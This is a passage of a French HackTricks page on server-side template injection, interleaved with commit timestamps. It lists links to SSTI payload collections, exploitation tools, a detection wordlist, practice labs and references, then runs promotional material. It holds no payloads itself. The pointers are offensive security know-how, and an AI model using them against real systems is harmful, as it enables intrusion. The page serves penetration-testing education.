Consultez le reste de [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection ) pour plus d'exploits. Vous pouvez également trouver des informations sur des balises intéressantes dans [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI ](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI )
2021-06-25 12:34:30 +00:00
2024-02-05 02:55:29 +00:00
## BlackHat PDF
2020-07-15 15:43:14 +00:00
2024-04-07 03:54:34 +00:00
{% file src="../../.gitbook/assets/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15 (1).pdf" %}
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
## Aide connexe
2020-07-15 15:43:14 +00:00
2023-07-11 13:30:24 +00:00
Si vous pensez que cela pourrait être utile, lisez :
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
* [Astuces Flask ](../../network-services-pentesting/pentesting-web/flask.md )
2024-04-07 03:54:34 +00:00
* [Fonctions magiques Python ](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssti-server-side-template-injection/broken-reference/README.md )
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
## Outils
2020-07-15 15:43:14 +00:00
2024-02-06 14:26:08 +00:00
* [https://github.com/Hackmanit/TInjA ](https://github.com/Hackmanit/TInjA )
* [https://github.com/vladko312/sstimap ](https://github.com/vladko312/sstimap )
* [https://github.com/epinna/tplmap ](https://github.com/epinna/tplmap )
* [https://github.com/Hackmanit/template-injection-table ](https://github.com/Hackmanit/template-injection-table )
2024-01-01 19:54:07 +00:00
2024-04-07 03:54:34 +00:00
## Liste de détection par force brute
2021-06-27 21:56:13 +00:00
2021-10-18 11:21:18 +00:00
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
2020-07-15 15:43:14 +00:00
2024-01-01 19:54:07 +00:00
## Pratique & Références
2020-07-15 15:43:14 +00:00
* [https://portswigger.net/web-security/server-side-template-injection/exploiting ](https://portswigger.net/web-security/server-side-template-injection/exploiting )
* [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI ](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI )
2024-02-06 14:26:08 +00:00
* [https://portswigger.net/web-security/server-side-template-injection ](https://portswigger.net/web-security/server-side-template-injection )
2022-04-28 16:01:33 +00:00
2022-10-25 15:56:49 +00:00
< figure > < img src = "https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt = "" > < figcaption > < / figcaption > < / figure >
2024-02-05 02:55:29 +00:00
[**RootedCON**](https://www.rootedcon.com/) est l'événement le plus pertinent en matière de cybersécurité en **Espagne** et l'un des plus importants en **Europe** . Avec **pour mission de promouvoir les connaissances techniques** , ce congrès est un point de rencontre bouillonnant pour les professionnels de la technologie et de la cybersécurité dans chaque discipline.
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2022-04-28 16:01:33 +00:00
< details >
2024-02-05 02:55:29 +00:00
< summary > < strong > Apprenez le piratage AWS de zéro à héros avec< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2024-01-01 19:54:07 +00:00
2024-04-07 03:54:34 +00:00
Autres moyens de soutenir HackTricks :
2022-04-28 16:01:33 +00:00
2024-01-01 19:54:07 +00:00
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF** , consultez les [**PLANS D'ABONNEMENT** ](https://github.com/sponsors/carlospolop )!
2024-02-05 02:55:29 +00:00
* Obtenez le [**swag officiel PEASS & HackTricks** ](https://peass.creator-spring.com )
* Découvrez [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), notre collection exclusive de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-04-07 03:54:34 +00:00
* **Rejoignez** 💬 le [**groupe Discord** ](https://discord.gg/hRep4RUj7f ) ou le [**groupe Telegram** ](https://t.me/peass ) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-02-05 02:55:29 +00:00
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) et [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >